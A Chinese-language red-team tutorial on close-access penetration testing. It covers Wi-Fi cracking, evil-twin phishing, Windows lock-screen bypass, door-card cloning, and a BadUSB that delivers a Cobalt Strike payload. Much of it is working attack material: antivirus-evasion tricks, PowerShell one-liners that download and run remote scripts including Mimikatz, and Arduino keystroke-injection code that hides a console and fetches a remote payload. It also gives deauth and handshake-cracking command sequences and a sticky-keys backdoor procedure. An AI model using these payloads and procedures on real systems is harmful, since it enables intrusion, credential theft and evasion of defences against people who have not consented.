一、近源滲透
近源滲透測試是網路空間安全領域逐漸興起的一種新的安全評估手段。
它是一種集常規網路攻防、物理接近、社會工程學及無線電通訊攻防等能力於一體的高規格網路安全評估行動。網路安全評估小組在簽訂滲透測試授權協議後,透過喬裝、社工等方式實地物理侵入企業辦公區域,透過其內部各種潛在攻擊面(如Wi-Fi網路、RFID門禁、暴露的有線網口、USB介面等)獲得“戰果”,最後以隱秘的方式將評估結果帶出上報,由此證明企業安全防護存在漏洞。
1.1 常見方式
1.無線網路卡
外接無線網路卡主要是用來配合kali破解無線密碼的,現在一般是透過抓握手包然後跑包來破解。還有其他的方式可以透過偽造SSID釣魚等等。
2.WIFI 大菠蘿
大菠蘿不是吃的那個玩意,可以說是一個釣魚WiFi。最新版本的大菠蘿功能更強大,其實可以替代上面的外接無線網路卡了。大菠蘿可以捕獲握手包並模仿目標AP,甚至可以完全模仿首選網路,從而實現中間人攻擊。
3.EMP干擾器
當前電子裝置和電路的工作頻率不斷提高,而工作電壓卻逐漸降低,因此對電磁脈衝(EMP)的敏感性和易損性也不斷增加。同時,電子系統中的積體電路對電磁脈衝比較敏感,往往一個較大的電磁脈衝,就會使整合塊產生誤碼、甚至電子元器件失效或燒燬,所以我們可以使用EMP干擾來開啟部分電子門禁和電子密碼鎖。甚至你可以用一個電蚊拍自制EMP請自行搜尋教程。
4.變色龍
變色龍主要有三種使用方法,第一種是隨機化UID進行模糊測試、第二種是支援IC卡的模擬、第三種是儲存多張虛擬化卡。有機會具體介紹
5.奈米指紋膜
這個公司門禁代打卡的小夥伴們應該不陌生,曾經有同事就這麼玩過。就是可以透過指紋拓印出一個跟原指紋一模一樣的指紋膜。至於怎樣能獲得對方的指紋....就得看你的社工啦。
6.鍵盤記錄器
如果你能接觸到目標主機,那你就可以將鍵盤記錄器接入到主機和鍵盤之間,並配置連線WI-FI,將鍵盤敲擊的資料實時傳回遠端伺服器。
7.內網硬體植入
透過前面的步驟,紅隊滲透小哥哥可能已經進入了藍隊內部,這個時候我們就需要可以在內網偷偷裝一個PacketSquirrel,作為中間人攻擊工具,PacketSquirrel可以捕獲網路端點的資料包、並且可以使用VPN和反向shell獲得遠端訪問許可權。
8.HID 攻擊
badusb是HID(人機介面)攻擊的一種,也稱為熱插拔攻擊。想象一下,你可以走到一臺計算機上,插入看似無害的USB驅動器,然後安裝後門,竊聽文件,竊取密碼...(用法很多,全靠想象)。
二、Badusb 上線CS
BadUSB是利用了USB協議上的漏洞,透過更改USB的內部韌體,在正常的USB介面接入後,模擬外接滑鼠、鍵盤的功能,以此來使目標主機執行已經精心構造好的命令。在此過程中不會引起防毒軟體、防火牆的一絲懷疑。而且因為是在韌體級別的應用,隨身碟格式化根本無法阻止其內部程式碼的執行。
同樣因為是對USB的利用,Windows、Linux、MAC等各類作業系統不必聯網下載專用的驅動程式。此外,向BadUSB燒錄的程式極為簡單,大部分是對鍵盤按鍵進行模擬,上手較為容易。
BadUSB也是社會工程學的一個典型示例,它極大地利用了人們的好奇心,在路邊撿到的USB,估計九成以上的人們都想看看裡面有什麼東西,而當你插入隨身碟,攻擊就很難再停止下來了。
2.1 準備工作
- 一個Arduino Leonardo開發板,偽裝成虛擬鍵盤的隨身碟
- Arduino IDE,用來燒錄程式碼
- 部署好CS服務端,用來上線
2.2 CS簡單免殺
部署CobaltStrike伺服器,生成powershell的payload
2.2.1 程式碼混淆
PowerShell的免殺可以用Invoke-Obfuscation,Invoke-Obfuscation主要是對ps1指令碼進行免殺,需要現有一個ps的payload。
進入Invoke-Obfuscation目錄後,在PowerShell中執行命令
Import-Module .\Invoke-Obfuscation.psd1
Invoke-Obfuscation
#然後執行命令,指定待處理的Ps1檔案
set scriptpath c:\xxx\payload.ps1
encoding
#輸入encoding 並選擇編碼方式,比如
1
#輸入命令,匯出免殺ps檔案到指定路徑
out C:\xxx\xxx.ps1
2.2.2 遠端程式碼執行-替換和干擾
雖然ps1程式碼自身免殺,但在⽤powershell執⾏遠端下載或執⾏shellcode時,很容易觸發殺軟⾏為規則。對於IEX這種方便快捷的方式直接執行會被360攔截。可嘗試從語法上簡單變化。主要是對DownloadString、http做⼀些處理。
1、替換檔名
copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe bypass.txt
bypass.txt "$a='IEX((New-Object Net.WebClient).DownloadString(''ht';$b='tp://www.xiaodi8.com/ms/ps/1.ps1''));Invoke-Mimikatz';IEX ($a+$b)"
2、替換關鍵字
powershell "$a='IEX((New-Object Net.WebClient).DownloadString(''ht';$b='tp://www.xiaodi8.com/ms/ps/1.ps1''));Invoke-Mimikatz';IEX ($a+$b)"
powershell -NoExit "$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://www.xiaodi8.com/ms/ps/payload.ps1'')'.Replace('123','adString');IEX ($c1+$c2)"
替換常見關鍵字
IEX $DoIt -- i`ex $DoIt
IEX $a -- ie`x $a
$var_runme -- $vrunme
$var_buffer -- $vbuffer
func_get_proc_address -- func_k
func_get_delegate_type -- func_l
$var_type_builder -- $vk
$var_parameters -- $vp
$var_return_type-- $ve
$var_procedure -- $v_pro
3、垃圾資料干擾
powershell -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal set-alias -name key -value IEX; key(New-Object Net.WebClient).DownloadString('ht'+'tp://www.xiaodi8.com/ms/ps/p1.ps1')
2.2.3 分離免殺
2.3 Arduino燒錄程式碼
下載地址:https://github.com/arduino/arduino-ide/releases/tag/2.1.0
開啟Arduino IDE
工具->板->選擇"Arduino Leonardo"
badusb可以模擬鍵盤輸入和滑鼠點選,具體按鍵設定:
delay(5000);//延時毫秒
Keyboard.begin(); //開始鍵盤通訊
Keyboard.end(); //結束鍵盤通訊
Keyboard.press(); //按下鍵盤按鍵 如果是非特殊按鍵如 數字、字母按鍵用單引號括起來
Keyboard.release(); //釋放鍵盤按鍵
Keyboard.println(""); //輸入字串使用雙引號括起來
Mouse.begin();//滑鼠事件開始
Mouse.click();//滑鼠單擊
Mouse.end();//滑鼠事件結束
Mouse.move();//滑鼠移動(x,y)
Mouse.press();//滑鼠按下
Mouse.release();//滑鼠鬆開
Mouse.isPressed();//
KEY_LEFT_CTRL
KEY_LEFT_SHIFT
KEY_LEFT_ALT
KEY_LEFT_GUI //win鍵
KEY_RIGHT_CTRL
KEY_RIGHT_SHIFT
KEY_RIGHT_ALT
KEY_RIGHT_GUI
KEY_UP_ARROW
KEY_DOWN_ARROW
KEY_LEFT_ARROW
KEY_RIGHT_ARROW
KEY_BACKSPACE
KEY_TAB
KEY_RETURN//Enter鍵
KEY_ESC
KEY_INSERT
KEY_DELETE
KEY_PAGE_UP
KEY_PAGE_DOWN
KEY_HOME
KEY_END
KEY_CAPS_LOCK
KEY_F1
KEY_F2
KEY_F3
KEY_F4
KEY_F5
KEY_F6
KEY_F7
KEY_F8
KEY_F9
KEY_F10
KEY_F11
KEY_F12
#include <Keyboard.h>
void setup() {
// putpower shell your setup code here, to run once
Keyboard.begin();//開始鍵盤通訊
delay(3000);//延時
Keyboard.press(KEY_LEFT_GUI);//win鍵
delay(500);
Keyboard.press('r');//r鍵
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
delay(500);
Keyboard.println("CMD /q /d /f:off /v:on /k MODE con: cols=15 lines=1"); //無回顯
//Keyboard.println("cmd /T:01 /K \"@echo off && mode con:COLS=15 LINES=1\""); //有回顯
delay(500);
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
Keyboard.println("powershell -WindowStyle Hidden -NoLogo -executionpolicy bypass Iex(New-Object Net.WebClient).DownloadString('http://x.x.x.x/xxx.ps1')");
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
Keyboard.end();//結束鍵盤通訊
}
void loop() {
// put your main code here, to run repeatedly:
}
在程式碼實現的過程中主要發現2個坑點。
1、目標機器預設中文輸入法的問題
2、在某些系統執行需要安裝驅動嘗試了2種解決方法:
1、模擬KEY_LEFT_SHIFT按鍵把中文輸出法切換為英文
2、模擬KEY_CAPS_LOCK按鍵輸出大寫字元
第一種解決方法,模擬KEY_LEFT_SHIFT按鍵,在目標為中文輸入法時,可以正常切換為英文,正常輸出,但一旦對方預設為英文輸入法,反而畫蛇添足。
第二種解決方法,模擬KEY_CAPS_LOCK按鍵,在預設使用中英文輸入法時都適用,唯一不適應的情況是對方預設使用中文輸入法且開啟了大寫輸入。
進行燒錄程式
注意右下角,程式寫到BadUSB裡,別寫錯地方了,程式不報錯證明成功
三、Wife滲透
3.1 Wife密碼爆破
Aircrack-ng是一款基於破解無線802.11協議的WEP及WPA-PSK加密的工具。該工具主要用了兩種攻擊方式進行WEP破解。一種是FMS攻擊,該攻擊方式是以發現該WEP漏洞的研究人員名字(Scott Fluhrer、Itsik Mantin及Adi Shamir)所命名;另一種是Korek攻擊,該攻擊方式是透過統計進行攻擊的,並且該攻擊的效率要遠高於FMS攻擊。
3.1.1 破解WEP加密的無線網路
Wired Equivalent Privacy或WEP(有線等效加密)協議是對在兩臺裝置間無線傳輸的資料進行加密的方式,用以防止非法使用者竊聽或侵入無線網路。不過密碼分析學家已經找出WEP好幾個弱點,因此在2003年被Wi-Fi Protected Access(WPA)淘汰,又在2004年由完整的IEEE 802.11i標準(又稱為WPA2)所取代。
現在使用該協議的較少,可參考文章
3.1.2 破解WPA/WPA2無線網路
WPA全名為Wi-Fi Protected Access,有WPA和WPA2兩個標準。它是一種保護無線電腦網路安全的協議。對於啟用WPA/WPA2加密的無線網路,其攻擊和破解步驟及攻擊是完全一樣的。不同的是,在使用airodump-ng進行無線探測的介面上,會提示為WPA CCMP PSK。當使用aireplay-ng進行攻擊後,同樣獲取到WPA握手資料包及提示;在破解時需要提供一個密碼字典。下面將介紹破解WPA/WPA2無線網路的方法。
使用aircrack-ng破解WPA/WPA2無線網路的具體操作步驟如下所示。
#檢視無線網路介面
airmon-ng
#停止無線網路介面
airmon-ng stop wlan0
#修改無線網路卡MAC地址
macchanger --mac 00:11:22:33:44:55 wlan0
#啟用無線網路介面
airmon-ng start wlan0
#捕獲資料包
airodump-ng -c 1 -w abc --bssid F6:4C:A1:B5:C6:81 mon0
#對無線路由器Test進行Deauth攻擊
aireplay-ng --deauth 1 -a 14:E6:E4:AC:FB:20 -c 00:11:22:33: 44:55 mon0
#破解密碼
aircrack-ng -w 1.txt test-01.cap
3.1.3 攻擊WPS無線
WPS是由Wi-Fi聯盟所推出的全新Wi-Fi安全防護設定標準。該標準主要是為了解決無線網路加密認證設定的步驟過於繁雜的弊病。因為通常使用者往往會因為設定步驟太麻煩,以至於不做任何加密安全設定,從而引起許多安全上的問題。所以很多人使用WPS設定無線裝置,可以透過個人識別碼(PIN)或按鈕(PBC)取代輸入一個很長的密碼短語。當開啟該功能後,攻擊者就可以使用暴力攻擊的方法來攻擊WPS。本小節將介紹使用各種工具攻擊WPS。
現在大部分路由器上都支援WPS功能。以前路由器有專門的WPS設定,現在的路由器使用QSS功能取代了。以TP-LINK型號為例,介紹設定WPS功能,只需要按下路由器上的QSS/RESET按鈕就可以了。
利用線上密碼生成1.txt字典,使用kail中自帶的Aircrack-ng,首先檢視無線網路卡的資訊
#檢視wlan0和eth0的資訊
iwconfig
#kill掉可能影響的程式
airmon-ng check kill
#啟用無線網路卡的監聽模式,啟用成功後,Ifconfig可以看到無線網路卡的資訊。
airmon-ng start wlan0
#監聽附近的所有wifi通訊
airodump-ng wlan0mon
#透過後臺持續執行,抓取指定ap的無線通訊,這裡-c指定對應通道
airodump-ng --bssid F6:4C:A1:B5:C6:81 -c 10 -w test wlan0mon
aireplay-ng -0 2 -a F6:4C:A1:B5:C6:81 -c 20:64:CB:0E:E3:ED wlan0mon
#檢視後臺執行的監聽程式,抓到資料包為成功
airodump-ng --bssid F6:4C:A1:B5:C6:81 -c 11 -w test wlan0mon
#透過碰撞破解握手包的密碼,獲取wifi密碼
aircrack-ng -w 1.txt test-01.cap
使用wifite更加簡單
#啟動Wifite工具,並指定使用common.txt密碼字典
wifite -dict common.txt
停止掃描無線網路,將顯示如下所示的資訊
從以上輸出資訊中,可以看到掃描到五個無線接入點和三個客戶端。在輸出資訊中,共顯示了7列。分別表示無線接入點編號、ESSID號、通道、加密方式、電功率、是否開啟wps和客戶端。如果僅有一個客戶端連線到無線接入點,則CLIENT列顯示是client。如果有多個客戶端連線的話,則顯示是clients。
此時,選擇要攻擊的無線接入點。這裡選擇第五個無線接入點,輸入“1”。然後按下Enter鍵將開始攻擊
攻擊成功,如果密碼在密碼本中,即可列出明文密碼。
3.2 Wife釣魚
使用fluxion工具,首先iwconfig檢視無線網路卡的資訊,然後fluxion -i安裝依賴
1、首先獲取目標握手包
[2] Handshake Snooper 檢索WPA/WPA2加密雜湊。
[3] 掃描所有通道 (2.4GHz & 5Ghz)
[2] 跳過
[2] aireplay-ng 解除認證方式 (侵略性)
[2] cowpatty 驗證 (推薦用這個)
[1] 每30秒鐘 (推薦).
[2] Synchronously (推薦).
2、之後泛洪攻擊目標ap,使其停止無線服務
[1] 選擇啟動攻擊方式
[1] 專屬門戶 建立一個“邪惡的雙胞胎”接入點
[2] 跳過
[2] wlan0 [*] Ralink Technology, Corp. RT2870/RT3070
[2] aireplay
[1] 流氓 AP - hostapd (推薦)
[1] hash - cowpatty
[1] 使用抓取到的hash檔案
[2] cowpatty 驗證 (推薦用這個)
3、透過釣魚框架,偽造目標網路資訊,誘導使用者連線
[1] 建立SSL證書
[2] 模擬
[03] 通用認證網頁 Chinese
使用者連線釣魚wifi後,將捕獲的使用者輸入的握手包,與之前認證的握手包進行校驗;如果校驗成功,則停止攻擊目標ap ,否則繼續攻擊,直至成功破解
3.3 無線路由器漏洞利用
RouterSploit它包含了27+個品牌的上百種漏洞利用模組,涉及的路由器、攝像頭等裝置有幾百種。可自動設別裝置型號自動掃描可利用的漏洞。
四、繞過windows鎖屏
近源滲透中經常遇到電腦存在登入密碼的情況。某些安全措施嚴格的目標,還會啟用Bitlocker磁碟加密。
4.1 Kon-Boot
Kon-Boot是最著名的密碼繞過工具。其原理可謂神奇:在系統引導階段,透過修改Windows核心,使驗證使用者憑證的程式碼失效。它不會刪除密碼,而是使登入時的密碼驗證失效,輸入任意密碼即可登入。
完整版本的Kon-Boot是付費軟體,個人許可證價格為$50,商業許可證價格為$140。
如果不打算購買許可證,也可以使用免費版本。本文使用最後一個免費版本V2.5。該版本可以繞過除Windows 10的線上賬戶之外的密碼。在繞過失敗時,Kon-Boot可以新增賬號,或安裝Shift鍵後門。
Kon-Boot可以滿足大多數滲透場景的需求,但它有著幾個缺點:
- 是付費軟體,全功能版價格為140美元
- 無法繞過Bitlocker磁碟加密
- Kon-Boot繞過密碼的成功率差強人意,經常需要重試
4.2 GrabAccess
和Kon-Boot類似,GrabAccess也是密碼繞過工具。對比起Kon-Boot,GrabAccess的優點有:
- 免費,並基於GPL協議開源
- 可以繞過Bitlocker植入後門
- 只要引導環境符合要求,成功率接近百分百
- 自動化植入木馬。只需要一步操作,耗時短,適合近源滲透場景
其最主要的優勢是成功率高。在實戰中發現Kon-boot繞過成功率非常之不穩定,尤其是針對Windows 10。
但在目前,GrabAccess僅支援UEFI引導的64位系統。針對Windows xp,或MBR引導的Windows 7,仍推薦Kon-Boot。
使用方式
GrabAccess最基礎的功能是安裝Shift鍵後門,將Windows粘滯鍵替換為工作管理員。在不登陸的情況下,也可以執行系統命令或讀寫檔案。
- 準備一個隨身碟。如果是FAT、FAT16或FAT32格式,則可以不刪除已有的檔案。否則需要格式化為上述格式。
- 下載GrabAccess,解壓,將EFI資料夾複製到隨身碟根目錄。
至此GrabAccess的最簡安裝完成。
- 將隨身碟插入電腦,重啟電腦。在啟動時進入BIOS選單。
- 選擇從隨身碟啟動,或設定隨身碟為第一啟動項。如圖所示,最後一個啟動項是隨身碟,選擇其啟動即可。
(如果BIOS開啟了Security Boot,還需將其設定為DISABLE)
- 在登入介面,連續按下五次Shift鍵,即可喚出工作管理員。
- 點選檔案-執行新任務-瀏覽,將右下角的“檔案型別”選擇為所有檔案,即可檢視、讀寫電腦上的所有檔案。
- 點選檔案可以執行cmd,執行任意程式碼。例如刪除當前賬號的密碼、新增新賬號等。
五、門禁鎖
門緊鎖一般可以分為無線電鎖、RFID鎖等
其中無線電鎖的無線遙控模組常見於門禁、停車場欄杆等
一般使用特定頻段315Mhz、443Mhz頻段
攻擊方式:
- 使用固定碼,則可被重放攻擊
- 部分滾動碼的生成演算法已被分析,可能造成滾動碼失效
- 在不知道密碼的情況下可進行爆破
RFID鎖具
ID卡與lC卡:
- ID卡較為古老,但廉價,ID卡只有一個ND號,無法儲存資料
- IC卡內部有儲存器,並且可以加密資料,IC卡以NXP公司的Mifare為主
- Mifare卡的儲存空間分為1K版和4K版,CPU卡在正常設計的情況下極難破解
該類卡可以讀取晶片中的資料,獲取金鑰資訊,進行偽造,網站有門禁複製器等工具直接複製,例如
